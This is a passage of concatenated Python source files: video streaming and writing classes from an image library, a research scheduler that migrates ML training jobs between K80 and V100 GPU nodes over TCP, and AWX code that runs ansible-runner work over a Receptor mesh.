To initialize:
js = JpegStreamer()
to update:
img.save(js)
to open a browser and display:
import webbrowser
webbrowser.open(js.url)
Note two optional parameters on the constructor:
- port (default 8080) which sets the TCP port you need to connect to
- sleep time (default 0.1) how often to update. Above 1 second seems to cause dropped connections in Google chrome
Once initialized, the buffer and sleeptime can be modified and will function properly -- port will not.
"""
server = ""
host = ""
port = ""
sleeptime = ""
framebuffer = ""
counter = 0
refreshtime = 0
def __init__(self, hostandport = 8080, st=0.1 ):
global _jpegstreamers
if (type(hostandport) == int):
self.port = hostandport
self.host = "localhost"
elif (isinstance(hostandport, basestring) and re.search(":", hostandport)):
(self.host, self.port) = hostandport.split(":")
self.port = int(self.port)
elif (type(hostandport) == tuple):
(self.host, self.port) = hostandport
self.sleeptime = st
self.server = JpegTCPServer((self.host, self.port), JpegStreamHandler)
self.server_thread = threading.Thread(target = self.server.serve_forever)
_jpegstreamers[self.port] = self
self.server_thread.daemon = True
self.server_thread.start()
self.framebuffer = self  # self-referential, ugh, but keeps some backwards compatibility
def url(self):
"""
Returns the JpegStreamer's browser-appropriate URL; if host and port were not provided in the constructor, it defaults to "http://localhost:8080/"
"""
return "http://" + self.host + ":" + str(self.port) + "/"
def streamUrl(self):
"""
Returns the URL of the MJPEG stream. If host and port are not set in the constructor, defaults to "http://localhost:8080/stream/"
"""
return self.url() + "stream"
class VideoStream():
"""
The VideoStream lets you save video files in a number of different formats.
You can initialize it by specifying the file you want to output::
vs = VideoStream("hello.avi")
You can also specify a framerate, and if you want to "fill" in missed frames.
So if you want to record a realtime video you may want to do this::
vs = VideoStream("myvideo.avi", 25, True) #note these are default values
Whereas if you want to do a stop-motion animation, you would want to turn fill off::
vs_animation = VideoStream("cartoon.avi", 15, False)
If you select a fill, the VideoStream will do its best to stay close to "real time" by duplicating frames or dropping frames when the clock doesn't sync up
with the file writes.
You can save a frame to the video by using the Image.save() function::
my_camera.getImage().save(vs)
"""
fps = 25
filename = ""
writer = ""
fourcc = ""
framefill = True
videotime = 0.0
starttime = 0.0
framecount = 0
def __init__(self, filename, fps = 25, framefill = True):
(revextension, revname) = filename[::-1].split(".", 1)
extension = revextension[::-1]
self.filename = filename
self.fps = fps
self.framefill = framefill
#if extension == "mpg":
self.fourcc = cv.CV_FOURCC('I', 'Y', 'U', 'V')
#self.fourcc = 0
#else:
# logger.warning(extension + " is not supported for video writing on this platform, sorry");
# return False
def initializeWriter(self, size):
self.writer = cv.CreateVideoWriter(self.filename, self.fourcc, self.fps, size, 1)
self.videotime = 0.0
self.starttime = time.time()
def writeFrame(self, img):
"""
This writes a frame to the video file.
It is called automatically by image.save(), but you can call it
directly to save just the bitmap, so image markup is not implicit.
Typically you use image.save(); calling writeFrame() directly allows
finer control.
"""
if not self.writer:
self.initializeWriter(img.size())
self.lastframe = img
frametime = 1.0 / float(self.fps)
targettime = self.starttime + frametime * self.framecount
realtime = time.time()
if self.framefill:
#see if we need to do anything to adjust to real time
if (targettime > realtime + frametime):
#if we're more than one frame ahead
#save the lastframe, but don't write to videoout
self.lastframe = img
return
elif (targettime < realtime - frametime):
#we're at least one frame behind
framesbehind = int((realtime - targettime) * self.fps) + 1
#figure out how many frames behind we are
lastframes = framesbehind / 2
for i in range(0, lastframes):
self.framecount += 1
cv.WriteFrame(self.writer, self.lastframe.getBitmap())
theseframes = framesbehind - lastframes
for i in range(0, theseframes):
self.framecount += 1
cv.WriteFrame(self.writer, img.getBitmap())
#split missing frames evenly between the prior and current frame
else: #we are on track
self.framecount += 1
cv.WriteFrame(self.writer, img.getBitmap())
else:
cv.WriteFrame(self.writer, img.getBitmap())
self.framecount += 1
self.lastframe = img
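# Worked example of the frame-fill bookkeeping in writeFrame() above (illustrative
# numbers): at fps=25 a frame lasts frametime = 0.04s. If realtime is 0.1s ahead of
# targettime (the writer has fallen behind), framesbehind = int(0.1 * 25) + 1 = 3,
# so lastframes = framesbehind / 2 = 1 copy of the previous frame is written and
# theseframes = 3 - 1 = 2 copies of the current frame, splitting the missing frames
# between the prior and current image. If instead targettime is more than one frame
# ahead of realtime, the image is only cached in lastframe and nothing is written.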
|
main.py
|
import pdb
import time
import os
import subprocess
import re
import random
import json
import numpy as np
import glob
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import socket
import argparse
import threading
import _thread
import signal
from datetime import datetime
parser = argparse.ArgumentParser(description='TCP client')
parser.add_argument('--tc', metavar='TESTCASE', type=str, help='select testcase')
args = parser.parse_args()
queue = [6, 33, 4, 43, 15, 47, 18, 42, 35, 40, 34, 20, 9, 29, 19, 22, 3, 5, 38, 7, 41, 39, 46, 17, 24, 28, 26, 45, 16, 14, 50, 48, 36, 27, 32, 8, 10, 49, 2, 12, 23, 1, 37, 31, 44, 21, 30, 11, 13, 25]
queue_dict = {}
arrival_time = 0
for item in queue:
arrival_time += np.random.poisson(30)
queue_dict[item] = arrival_time
queue_timer = time.time()
job_start = {} #{'49': time1, '15': time2...}
JCT = {}
PJCT = {} # practical complete time, not applicable for all jobs
PJCT_epoch = {}
overhead = {} # initialize so that every job starts with 0s overhead time
for item in queue:
overhead[str(item)] = 0
ovhd_start = {} # initialize this to 0 as well
for item in queue:
ovhd_start[str(item)] = 0
num_mig = {} # initialize migration time to 0
for item in queue:
num_mig[str(item)] = 0
queue_start = {} # initialize this to 0 as well
for item in queue:
queue_start[str(item)] = 0
queue_time = {} # initialize this to 0 as well
for item in queue:
queue_time[str(item)] = 0
index = 0
K80_cap = 8
V100_cap = 4
K80_used = 0
V100_used = 0
qualified_jobs = 0
K80_job = {}
for i in range(8):
K80_job[str(i)] = 'idle'
V100_job = {}
for i in range(4):
V100_job[str(i)] = 'idle'
all_job = []
qualified_job = []
pc_job = [] # list of jobs that are practically completed
K80_node = 'c2180'
V100_node = 'd1020'
host_node = 'c0168'
testcase = args.tc
### also, change .h5 file folder in jobs ###
INTERVAL = 30 # make decision every 30s
QUALIFY_TIME = 300 # 300s or 5min as threshold
def send_signal(node, cmd):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 10000 if node == K80_node else 10001
# Connect the socket to the port where the server is listening
server_address = (node, int(port))
print('connecting to {} port {}'.format(*server_address))
sock.connect(server_address)
try:
# Send data
message = cmd.encode('utf-8') #b'save 35' #b'start 35 gpu 6'#b'save 35'
print('sending {!r}'.format(message))
sock.sendall(message)
while True:
data = sock.recv(32)
if 'success' in data.decode('utf-8'):
print('received {!r}'.format(data))
break
else:
print('waiting for success signal')
time.sleep(1)
finally:
#print('closing socket')
sock.close()
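# Sketch of the command strings sent through send_signal() (taken from the call
# sites below): the node daemon listening on port 10000 (K80) or 10001 (V100)
# replies with a message containing 'success' once the command has been handled.
#   'start 35 gpu 6'   -> start_job(): launch job 35 on GPU 6 of that node
#   'save 35'          -> save_job(): checkpoint job 35
#   'resume 50 gpu 3'  -> resume_job(): restore job 50 from its checkpoint on GPU 3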
def max_param_promotion(K80_free, V100_free, V100_job, promote_list, force_demote):
num_demote = len(force_demote)
num_promote = len(promote_list)
V100_vacant = num_demote + V100_free
K80_vacant = num_promote + K80_free
global param_dict
if K80_vacant >= num_demote: # if more vacant K80s than demote jobs, always demote
# selectively promote among active V100 jobs and promote list jobs
V100_qual = list(set(list(V100_job.values())) - set(force_demote))
if 'idle' in V100_qual:
V100_qual.remove('idle')
V100_pool = list(set(V100_qual).union(promote_list))
if len(V100_pool) <= 4: # promote all jobs as well
return promote_list, force_demote
else: # promote the top 4 jobs
pool_dict = {}
for job in V100_pool:
if 'job'+job in param_dict:
pool_dict[job] = param_dict['job'+job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=True)[:4]
promotion_list = list(set(promote_list).intersection(sorted_pool))
demotion_list = list(set(list(V100_job.values())).difference(sorted_pool))
if 'idle' in demotion_list:
demotion_list.remove('idle') # this includes force demotion
return promotion_list, demotion_list
elif V100_vacant >= num_promote: # if more vacant V100s than promote jobs, always promote
# less vacant K80s than demote jobs, select worst among force demote list
pool_dict = {} # here the pool only includes force demote jobs
for job in force_demote:
if 'job'+job in param_dict:
pool_dict[job] = param_dict['job'+job]
sorted_pool = sorted(pool_dict, key=pool_dict.get, reverse=False)[:K80_vacant]
return promote_list, sorted_pool
else:
raise ValueError('Bug with max param promotion, condition not considered')
#a, b = max_param_promotion(1, 1, {0: '49', 1: '39', 2: '50', 3: 'idle'}, ['40', '37'], [])
#c, d = max_param_promotion(1, 1, {0: 'idle', 1: 'idle', 2: 'idle', 3: 'idle'}, [], [])
#e, f = max_param_promotion(1, 1, {'0': '49', '1': '39', '2': '50', '3': 'idle'}, ['40', '37'], [])
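# Worked example for max_param_promotion(), using the first commented call above
# and hypothetical parameter counts: with K80_free=1, V100_free=1, V100 running
# {'49', '39', '50'}, promote_list=['40', '37'] and no forced demotions, the V100
# pool has 5 candidates, so the 4 jobs with the largest param_dict values keep (or
# are promoted onto) the V100s; any currently running V100 job outside that top 4
# is returned in the demotion list and moves back to a K80.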
def save_job(node, job): # save_job('c2176', '50')
# first wait for the job to be qualified for checkpointing
while True: # wait for ckpt_qual to be available
global ckpt_qual_dict
if ckpt_qual_dict['job'+job] == 1:
ckpt_qual_dict['job'+job] = 0
break
time.sleep(5)
send_signal(node, 'save ' + job)
global ovhd_start
global pc_job
#if job not in pc_job:
ovhd_start[job] = time.time()
# after sending checkpoint signal, wait for it to finish
while True:
time.sleep(5)
with open('checkpoint.json', 'r') as fp2:
checkpoint_dict = json.load(fp2)
if checkpoint_dict['job'+job] == 1: # checkpoint has finished
print('checkpointed successfully')
checkpoint_dict['job'+job] = 0 # reset it
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp2:
fp2.write(json_file)
break
# also check if job has already finished
global finish_dict
if finish_dict['job'+job] == 1:
break
# resume job
def resume_job(node, gpu, job): # resume_job('c2176', '3', '50')
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'resume ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# start job
def start_job(node, gpu, job):
# first wait for pid.json to show up, rename pid.json to pid_lock.json
# then in jobx.py, modify pid_lock.json, rename it to pid.json
# then wait for pid.json to show up
while True:
if os.path.exists('pid.json'):
os.rename('pid.json', 'pid_lock.json')
break
else:
time.sleep(1)
cmd = 'start ' + job + ' gpu ' + gpu
send_signal(node, cmd)
while True:
if os.path.exists('pid.json'):
break
else:
time.sleep(1)
# function that checks the tensorboard log of currently running jobs and records practically complete jobs in a global list
# once a job reaches practical complete, it cannot be promoted. If it's already promoted, it gets demoted.
# criteria for practical complete: loss improvement has been smaller than 0.001 for the last 3 consecutive epochs
def check_practical_complete(job_list):
log_path = '/scratch/li.baol/tsrbrd_log/job_runs/' + testcase + '/'
threshold = 0.001
global pc_job
global PJCT
global PJCT_epoch
for job in job_list:
# only check for job outside of practical complete job list
if job not in pc_job and job != 'idle':
log_dir = log_path + 'job' + job + '/*'
dirs = glob.glob(log_dir)
dirs.sort()
loss_combine = []
for tc in dirs:
iterator = EventAccumulator(tc).Reload()
if len(iterator.Tags()['scalars']) > 0:
tag = 'loss' #iterator.Tags()['scalars'][2] # this is tag for loss
loss = [item.value for item in iterator.Scalars(tag)]
loss_combine += loss
# now that we have the loss at each epoch, we can check if it has reached practical complete
if len(loss_combine) >= 4:
latest_loss = loss_combine[-4:]
finished = True
for i in range(3):
# if the difference is >= 0.01, the job has not reached practical complete yet
if latest_loss[i] - latest_loss[i+1] >= threshold:
finished = False
break
if finished:
print('job' + job + ' has reached practical complete, the last 4 loss values are')
print(str(latest_loss))
pc_job.append(job)
PJCT[job] = int(time.time() - job_start[job])
PJCT_epoch[job] = len(loss_combine)
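# Worked example for check_practical_complete() (illustrative loss values): with
# threshold = 0.001, a job whose last four recorded losses are
# [0.5200, 0.5195, 0.5191, 0.5188] improves by less than 0.001 on each of the last
# three steps, so it is added to pc_job and its PJCT / PJCT_epoch entries are set.
# A single step that still improves by 0.001 or more keeps the job out of pc_job.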
############### first clear finish status of all jobs ####################
pid_dict = {}
with open('pid.json', 'r') as fp:
pid_dict = json.load(fp)
for key in pid_dict:
pid_dict[key] = 0
json_file = json.dumps(pid_dict)
with open('pid.json', 'w') as fp:
fp.write(json_file)
checkpoint_dict = {}
with open('checkpoint.json', 'r') as fp:
checkpoint_dict = json.load(fp)
for key in checkpoint_dict:
checkpoint_dict[key] = 0
json_file = json.dumps(checkpoint_dict)
with open('checkpoint.json', 'w') as fp:
fp.write(json_file)
# initialize all parameters to 0
param_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
param_dict[job_name] = 0
ckpt_qual_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
ckpt_qual_dict[job_name] = 0
finish_dict = {}
for i in range(50):
job_name = 'job' + str(i + 1)
finish_dict[job_name] = 0
epoch_waste_dict = {}
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
for key in epoch_waste_dict:
epoch_waste_dict[key] = 0
json_file = json.dumps(epoch_waste_dict)
with open('epoch_waste.json', 'w') as fp:
fp.write(json_file)
#################### background thread running TCP socket ########################
def thread_function():
# here listen on the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host_node, 10002)
print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
sock.listen(5)
while True:
# Wait for a connection
connection, client_address = sock.accept()
try:
while True:
data = connection.recv(32)
if data:
data_str = data.decode('utf-8')
if 'param' in data_str:
global param_dict
job_name = data_str.split(' ')[0]
param_num = int(data_str.split(' ')[2])
param_dict[job_name] = param_num
elif 'ckpt_qual' in data_str:
global ckpt_qual_dict
job_name = data_str.split(' ')[0]
ckpt_qual_dict[job_name] = 1
elif 'finish' in data_str:
global finish_dict
job_name = data_str.split(' ')[0]
finish_dict[job_name] = 1
print('received ' + data_str)
connection.sendall(b'success')
#time.sleep(5)
else:
break
finally:
connection.close()
x = threading.Thread(target=thread_function, daemon=True)
x.start()
###############################################################################
######################################################################
while True:
# termination condition:
# all the jobs have finished
################### check for finished jobs on K80 and V100 ##############################
for gpu, job in K80_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
K80_used -= 1
K80_job[gpu] = 'idle'
print('K80 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
for gpu, job in V100_job.items():
if job != 'idle':
if finish_dict['job'+job] == 1:
V100_used -= 1
V100_job[gpu] = 'idle'
print('V100 finished job: ' + job)
JCT[job] = int(time.time() - job_start[job])
elif ovhd_start[job] != 0:
# check if ckpt overhead has finished
if ckpt_qual_dict['job'+job] == 1:
overhead[job] += int(time.time() - ovhd_start[job])
ovhd_start[job] = 0
################ check for practical finished jobs on K80 and V100 ######################
all_job = list(K80_job.values()) + list(V100_job.values())
check_practical_complete(all_job)
################ check run time of current K80 job, update qualified_job #################
for job in list(K80_job.values()):
if job not in qualified_job and job != 'idle':
runtime = int(time.time() - job_start[job])
if runtime >= QUALIFY_TIME:
qualified_job.append(job)
print('job' + job + ' has been qualified for promotion')
################ make promotion decisions ########################
V100_free = V100_cap - V100_used
K80_free = K80_cap - K80_used
# this returns available jobs for promotion. Has to be qualified, and currently in K80, but not practically complete
promote_list = list(set(qualified_job).intersection(list(K80_job.values())).difference(pc_job))
# this returns job forced to be demoted. Currently in V100, and is practically complete
force_demote = list(set(list(V100_job.values())).intersection(pc_job))
if len(promote_list) > 0:
promoted, demoted = max_param_promotion(K80_free, V100_free, V100_job, promote_list, force_demote)
if len(promoted) > 0:
print('promoted jobs: ', promoted)
if len(demoted) > 0:
print('demoted jobs: ', demoted)
# stop all promoted jobs on K80
for gpu, job in K80_job.items():
if job in promoted:
save_job(K80_node, job)
K80_job[gpu] = 'idle'
K80_used -= 1
# stop all demoted jobs on V100
for gpu, job in V100_job.items():
if job in demoted:
save_job(V100_node, job)
V100_job[gpu] = 'idle'
V100_used -= 1
# resume promoted jobs on V100, make sure the gpu is idle
for job_new in promoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in V100_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(V100_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
V100_job[gpu] = job_new
promoted.remove(job_new)
V100_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
promoted.remove(job_new)
# resume demoted jobs on K80, make sure the gpu is idle
for job_new in demoted[:]:
if finish_dict['job'+job_new] != 1:
for gpu, job in K80_job.items():
if job == 'idle': # if gpu idle, schedule new job here
resume_job(K80_node, gpu, job_new)
#if job_new not in pc_job:
num_mig[job_new] += 1
K80_job[gpu] = job_new
demoted.remove(job_new)
K80_used += 1
break
else: # job has already finished before checkpointing
JCT[job_new] = int(time.time() - job_start[job_new])
demoted.remove(job_new)
# perform a check, make sure all promoted/demoted jobs are scheduled
if len(promoted) > 0 or len(demoted) > 0:
raise ValueError('Bug with promotion scheme, more jobs than free gpus')
################ submit new jobs to vacant K80 GPUs ############################
# check if there are vacant K80s
## yes: submit jobs from queue
## no: do nothing
if K80_used < K80_cap:
K80_free = K80_cap - K80_used
for i in range(K80_free):
time_passed = int(time.time() - queue_timer)
if index < len(queue) and queue_dict[queue[index]] < time_passed: # make sure job has arrived in the queue
job_new = str(queue[index])
for gpu, job in K80_job.items():
if job == 'idle': # schedule new job here if idle
start_job(K80_node, gpu, job_new)
K80_job[gpu] = job_new
job_start[job_new] = time.time()
index += 1
K80_used += 1
time.sleep(5) # don't communicate too often
break
############### wait for next iteration
time.sleep(INTERVAL)
################ check if termination condition is met ################
K80_idle_num = sum(value == 'idle' for value in K80_job.values())
V100_idle_num = sum(value == 'idle' for value in V100_job.values())
if K80_idle_num == K80_cap and V100_idle_num == V100_cap and index == len(queue):
print('all jobs are finished!')
break
# get average JCT
average_JCT = np.average(list(JCT.values()))
JCT['average'] = average_JCT
average_PJCT = np.average(list(PJCT.values()))
PJCT['average'] = average_PJCT
average_overhead = np.average(list(overhead.values()))
overhead['average'] = average_overhead
# after everything is finished
with open('epoch_waste.json', 'r') as fp:
epoch_waste_dict = json.load(fp)
print('finished all runs')
JCT_name = testcase + '_JCT.json'
PJCT_name = testcase + '_PJCT.json'
PJCT_epoch_name = testcase + '_PJCT_epoch.json'
overhead_name = testcase + '_overhead.json'
num_mig_name = testcase + '_num_mig.json'
epoch_waste_name = testcase + '_epoch_waste.json'
param_name = 'param.json'
ckpt_qual_name = 'ckpt_qual.json'
finish_name = 'finish.json'
with open(JCT_name, 'w') as fp1:
json.dump(JCT, fp1, sort_keys=True, indent=4)
with open(PJCT_name, 'w') as fp2:
json.dump(PJCT, fp2, sort_keys=True, indent=4)
with open(PJCT_epoch_name, 'w') as fp2:
json.dump(PJCT_epoch, fp2, sort_keys=True, indent=4)
with open(overhead_name, 'w') as fp3:
json.dump(overhead, fp3, sort_keys=True, indent=4)
with open(num_mig_name, 'w') as fp3:
json.dump(num_mig, fp3, sort_keys=True, indent=4)
with open(epoch_waste_name, 'w') as fp3:
json.dump(epoch_waste_dict, fp3, sort_keys=True, indent=4)
with open(param_name, 'w') as fp1:
json.dump(param_dict, fp1, sort_keys=True, indent=4)
with open(ckpt_qual_name, 'w') as fp1:
json.dump(ckpt_qual_dict, fp1, sort_keys=True, indent=4)
with open(finish_name, 'w') as fp1:
json.dump(finish_dict, fp1, sort_keys=True, indent=4)
|
receptor.py
|
# Python
from base64 import b64encode
from collections import namedtuple
import concurrent.futures
from enum import Enum
import logging
import os
import shutil
import socket
import sys
import threading
import time
import yaml
# Django
from django.conf import settings
# Runner
import ansible_runner
# AWX
from awx.main.utils.execution_environments import get_default_pod_spec
from awx.main.exceptions import ReceptorNodeNotFound
from awx.main.utils.common import (
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
# Receptorctl
from receptorctl.socket_interface import ReceptorControl
logger = logging.getLogger('awx.main.tasks.receptor')
__RECEPTOR_CONF = '/etc/receptor/receptor.conf'
RECEPTOR_ACTIVE_STATES = ('Pending', 'Running')
class ReceptorConnectionType(Enum):
DATAGRAM = 0
STREAM = 1
STREAMTLS = 2
def get_receptor_sockfile():
with open(__RECEPTOR_CONF, 'r') as f:
data = yaml.safe_load(f)
for section in data:
for entry_name, entry_data in section.items():
if entry_name == 'control-service':
if 'filename' in entry_data:
return entry_data['filename']
else:
raise RuntimeError(f'Receptor conf {__RECEPTOR_CONF} control-service entry does not have a filename parameter')
else:
raise RuntimeError(f'Receptor conf {__RECEPTOR_CONF} does not have control-service entry needed to get sockfile')
def get_tls_client(use_stream_tls=None):
if not use_stream_tls:
return None
with open(__RECEPTOR_CONF, 'r') as f:
data = yaml.safe_load(f)
for section in data:
for entry_name, entry_data in section.items():
if entry_name == 'tls-client':
if 'name' in entry_data:
return entry_data['name']
return None
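# Sketch of the receptor.conf shape that get_receptor_sockfile() and
# get_tls_client() above expect: a YAML list of single-key sections. Only the
# 'filename' and 'name' keys are read here; the values shown are illustrative.
#
#   - control-service:
#       filename: /var/run/receptor/receptor.sock
#   - tls-client:
#       name: tlsclient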
def get_receptor_ctl():
receptor_sockfile = get_receptor_sockfile()
try:
return ReceptorControl(receptor_sockfile, config=__RECEPTOR_CONF, tlsclient=get_tls_client(True))
except RuntimeError:
return ReceptorControl(receptor_sockfile)
def get_conn_type(node_name, receptor_ctl):
all_nodes = receptor_ctl.simple_command("status").get('Advertisements', None)
for node in all_nodes:
if node.get('NodeID') == node_name:
return ReceptorConnectionType(node.get('ConnType'))
raise ReceptorNodeNotFound(f'Instance {node_name} is not in the receptor mesh')
def administrative_workunit_reaper(work_list=None):
"""
This releases completed work units that were spawned by actions inside of this module.
Specifically, this should catch any completed work unit left by
- worker_info
- worker_cleanup
These should ordinarily be released when the method finishes, but this is a
cleanup of last-resort, in case something went awry
"""
receptor_ctl = get_receptor_ctl()
if work_list is None:
work_list = receptor_ctl.simple_command("work list")
for unit_id, work_data in work_list.items():
extra_data = work_data.get('ExtraData')
if (extra_data is None) or (extra_data.get('RemoteWorkType') != 'ansible-runner'):
continue # if this is not ansible-runner work, we do not want to touch it
params = extra_data.get('RemoteParams', {}).get('params')
if not params:
continue
if not (params == '--worker-info' or params.startswith('cleanup')):
continue # if this is not a cleanup or health check, we do not want to touch it
if work_data.get('StateName') in RECEPTOR_ACTIVE_STATES:
continue # do not want to touch active work units
logger.info(f'Reaping orphaned work unit {unit_id} with params {params}')
receptor_ctl.simple_command(f"work release {unit_id}")
class RemoteJobError(RuntimeError):
pass
def run_until_complete(node, timing_data=None, **kwargs):
"""
Runs an ansible-runner work_type on remote node, waits until it completes, then returns stdout.
"""
receptor_ctl = get_receptor_ctl()
use_stream_tls = getattr(get_conn_type(node, receptor_ctl), 'name', None) == "STREAMTLS"
kwargs.setdefault('tlsclient', get_tls_client(use_stream_tls))
kwargs.setdefault('ttl', '20s')
kwargs.setdefault('payload', '')
transmit_start = time.time()
sign_work = False if settings.IS_K8S else True
result = receptor_ctl.submit_work(worktype='ansible-runner', node=node, signwork=sign_work, **kwargs)
unit_id = result['unitid']
run_start = time.time()
if timing_data:
timing_data['transmit_timing'] = run_start - transmit_start
run_timing = 0.0
stdout = ''
try:
resultfile = receptor_ctl.get_work_results(unit_id)
while run_timing < 20.0:
status = receptor_ctl.simple_command(f'work status {unit_id}')
state_name = status.get('StateName')
if state_name not in RECEPTOR_ACTIVE_STATES:
break
run_timing = time.time() - run_start
time.sleep(0.5)
else:
raise RemoteJobError(f'Receptor job timeout on {node} after {run_timing} seconds, state remains in {state_name}')
if timing_data:
timing_data['run_timing'] = run_timing
stdout = resultfile.read()
stdout = str(stdout, encoding='utf-8')
finally:
if settings.RECEPTOR_RELEASE_WORK:
res = receptor_ctl.simple_command(f"work release {unit_id}")
if res != {'released': unit_id}:
logger.warn(f'Could not confirm release of receptor work unit id {unit_id} from {node}, data: {res}')
receptor_ctl.close()
if state_name.lower() == 'failed':
work_detail = status.get('Detail', '')
if work_detail:
raise RemoteJobError(f'Receptor error from {node}, detail:\n{work_detail}')
else:
raise RemoteJobError(f'Unknown ansible-runner error on node {node}, stdout:\n{stdout}')
return stdout
def worker_info(node_name, work_type='ansible-runner'):
error_list = []
data = {'errors': error_list, 'transmit_timing': 0.0}
try:
stdout = run_until_complete(node=node_name, timing_data=data, params={"params": "--worker-info"})
yaml_stdout = stdout.strip()
remote_data = {}
try:
remote_data = yaml.safe_load(yaml_stdout)
except Exception as json_e:
error_list.append(f'Failed to parse node {node_name} --worker-info output as YAML, error: {json_e}, data:\n{yaml_stdout}')
if not isinstance(remote_data, dict):
error_list.append(f'Remote node {node_name} --worker-info output is not a YAML dict, output:{stdout}')
else:
error_list.extend(remote_data.pop('errors', [])) # merge both error lists
data.update(remote_data)
except RemoteJobError as exc:
details = exc.args[0]
if 'unrecognized arguments: --worker-info' in details:
error_list.append(f'Old version (2.0.1 or earlier) of ansible-runner on node {node_name} without --worker-info')
else:
error_list.append(details)
except (ReceptorNodeNotFound, RuntimeError) as exc:
error_list.append(str(exc))
# If we have a connection error, missing keys would be a trivial consequence of that
if not data['errors']:
# see tasks.py usage of keys
missing_keys = set(('runner_version', 'mem_in_bytes', 'cpu_count')) - set(data.keys())
if missing_keys:
data['errors'].append('Worker failed to return keys {}'.format(' '.join(missing_keys)))
return data
def _convert_args_to_cli(vargs):
"""
For the ansible-runner worker cleanup command
converts the dictionary (parsed argparse variables) used for the Python interface
into a string of CLI options, which has to be used on execution nodes.
"""
args = ['cleanup']
for option in ('exclude_strings', 'remove_images'):
if vargs.get(option):
args.append('--{}={}'.format(option.replace('_', '-'), ' '.join(vargs.get(option))))
for option in ('file_pattern', 'image_prune', 'process_isolation_executable', 'grace_period'):
if vargs.get(option) is True:
args.append('--{}'.format(option.replace('_', '-')))
elif vargs.get(option) not in (None, ''):
args.append('--{}={}'.format(option.replace('_', '-'), vargs.get(option)))
return args
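# Worked example for _convert_args_to_cli() (hypothetical values):
#   _convert_args_to_cli({'exclude_strings': ['awx_42_'], 'image_prune': True, 'grace_period': 60})
#   -> ['cleanup', '--exclude-strings=awx_42_', '--image-prune', '--grace-period=60']
# worker_cleanup() below joins this into the remote
# 'ansible-runner worker cleanup ...' invocation.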
def worker_cleanup(node_name, vargs, timeout=300.0):
args = _convert_args_to_cli(vargs)
remote_command = ' '.join(args)
logger.debug(f'Running command over receptor mesh on {node_name}: ansible-runner worker {remote_command}')
stdout = run_until_complete(node=node_name, params={"params": remote_command})
return stdout
class TransmitterThread(threading.Thread):
def run(self):
self.exc = None
try:
super().run()
except Exception:
self.exc = sys.exc_info()
class AWXReceptorJob:
def __init__(self, task, runner_params=None):
self.task = task
self.runner_params = runner_params
self.unit_id = None
if self.task and not self.task.instance.is_container_group_task:
execution_environment_params = self.task.build_execution_environment_params(self.task.instance, runner_params['private_data_dir'])
self.runner_params.update(execution_environment_params)
if not settings.IS_K8S and self.work_type == 'local' and 'only_transmit_kwargs' not in self.runner_params:
self.runner_params['only_transmit_kwargs'] = True
def run(self):
# We establish a connection to the Receptor socket
receptor_ctl = get_receptor_ctl()
res = None
try:
res = self._run_internal(receptor_ctl)
return res
finally:
# Make sure to always release the work unit if we established it
if self.unit_id is not None and settings.RECEPTOR_RELEASE_WORK:
try:
receptor_ctl.simple_command(f"work release {self.unit_id}")
except Exception:
logger.exception(f"Error releasing work unit {self.unit_id}.")
@property
def sign_work(self):
return False if settings.IS_K8S else True
def _run_internal(self, receptor_ctl):
# Create a socketpair. Where the left side will be used for writing our payload
# (private data dir, kwargs). The right side will be passed to Receptor for
# reading.
sockin, sockout = socket.socketpair()
transmitter_thread = TransmitterThread(target=self.transmit, args=[sockin])
transmitter_thread.start()
# submit our work, passing
# in the right side of our socketpair for reading.
_kw = {}
if self.work_type == 'ansible-runner':
_kw['node'] = self.task.instance.execution_node
use_stream_tls = get_conn_type(_kw['node'], receptor_ctl).name == "STREAMTLS"
_kw['tlsclient'] = get_tls_client(use_stream_tls)
result = receptor_ctl.submit_work(worktype=self.work_type, payload=sockout.makefile('rb'), params=self.receptor_params, signwork=self.sign_work, **_kw)
self.unit_id = result['unitid']
# Update the job with the work unit in-memory so that the log_lifecycle
# will print out the work unit that is to be associated with the job in the database
# via the update_model() call.
# We want to log the work_unit_id as early as possible. A failure can happen in between
# when we start the job in receptor and when we associate the job <-> work_unit_id.
# In that case, there will be work running in receptor and Controller will not know
# which Job it is associated with.
        # We do not programmatically handle this case. Ideally, we would handle this with a reaper case.
# The two distinct job lifecycle log events below allow for us to at least detect when this
# edge case occurs. If the lifecycle event work_unit_id_received occurs without the
        # work_unit_id_assigned event then this case may have occurred.
self.task.instance.work_unit_id = result['unitid'] # Set work_unit_id in-memory only
self.task.instance.log_lifecycle("work_unit_id_received")
self.task.update_model(self.task.instance.pk, work_unit_id=result['unitid'])
self.task.instance.log_lifecycle("work_unit_id_assigned")
sockin.close()
sockout.close()
if transmitter_thread.exc:
raise transmitter_thread.exc[1].with_traceback(transmitter_thread.exc[2])
transmitter_thread.join()
# Artifacts are an output, but sometimes they are an input as well
# this is the case with fact cache, where clearing facts deletes a file, and this must be captured
artifact_dir = os.path.join(self.runner_params['private_data_dir'], 'artifacts')
if os.path.exists(artifact_dir):
shutil.rmtree(artifact_dir)
resultsock, resultfile = receptor_ctl.get_work_results(self.unit_id, return_socket=True, return_sockfile=True)
# Both "processor" and "cancel_watcher" are spawned in separate threads.
# We wait for the first one to return. If cancel_watcher returns first,
# we yank the socket out from underneath the processor, which will cause it
